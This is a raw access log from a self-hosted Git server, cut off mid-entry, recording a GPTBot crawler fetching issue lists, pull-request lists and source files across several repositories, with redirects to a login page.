"https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:35:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9974] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=latest&state=closed&type=all" -[17/Feb/2026:18:35:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13328] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12566] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" -[17/Feb/2026:18:35:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10039] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:35:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10210] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&state=closed&type=all" -[17/Feb/2026:18:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10203] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=mostcomment&state=open&type=all" -[17/Feb/2026:18:35:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10008] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:35:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10207] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=closed&type=all" -[17/Feb/2026:18:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=nearduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=closed&type=all" -[17/Feb/2026:18:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=leastupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" -[17/Feb/2026:18:35:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10211] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:35:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" -[17/Feb/2026:18:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:35:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10205] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=closed&type=all" -[17/Feb/2026:18:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=recentupdate&state=closed&type=all" -[17/Feb/2026:18:35:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=nearduedate&state=open&type=all" -[17/Feb/2026:18:35:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:18:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&state=closed&type=all" [Client 74.7.227.38] [Length 9983] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&state=closed&type=all" -[17/Feb/2026:18:35:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10179] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=recentupdate&state=all&type=all" -[17/Feb/2026:18:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11080] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:35:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/src-old/WRONG-DESIGNED-log_macros.hpp" -[17/Feb/2026:18:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:18:35:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10180] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&state=open&type=all" -[17/Feb/2026:18:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" -[17/Feb/2026:18:35:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10016] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 30096] [Gzip 12.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:18:35:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:35:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10007] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=leastcomment&state=all&type=all" -[17/Feb/2026:18:35:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py?display=source" [Client 74.7.227.38] [Length 29987] [Gzip 8.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/ui_main.py" -[17/Feb/2026:18:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:35:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11099] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/controller.cpp.o" -[17/Feb/2026:18:35:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=oldest&state=closed&type=all" -[17/Feb/2026:18:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" -[17/Feb/2026:18:35:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=latest&state=all&type=all" -[17/Feb/2026:18:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:18:35:43 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 